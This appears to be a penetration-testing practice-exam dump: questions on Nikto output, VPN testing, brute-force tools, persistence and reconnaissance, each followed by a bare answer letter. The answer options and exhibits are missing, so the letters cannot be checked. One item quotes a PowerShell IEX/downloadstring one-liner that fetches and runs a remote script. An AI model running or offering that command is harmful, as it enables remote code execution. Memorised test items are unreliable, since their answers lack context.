Click the exhibit button.
Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used
to exploit the target system? (Choose two.)
B D
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the
software developer perform?
A
A penetration tester runs the following on a machine:
Which of the following will be returned?
B
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with
an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?
B
Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1);Invoke-Cmdlet
Which of the following BEST describes the actions performed by this command?
B
Which of the following tools is used to perform a credential brute force attack?
A
Explanation:
Reference: https://www.greycampus.com/blog/information-security/brute-force-attacks-prominent-tools-to-tackle-such-
attacks
During a physical security review, a detailed penetration testing report was obtained, which was issued to a security analyst
and then discarded in the trash. The report contains validated critical risk exposures. Which of the following processes would
BEST protect this information from being disclosed in the future?
B
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following
would achieve that goal?
D
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this
engagement?
D
Explanation:
Reference: https://blog.securelayer7.net/api-penetration-testing-with-owasp-2017-test-cases/
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work
phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following
BEST describes the technique that was used to obtain this information?
B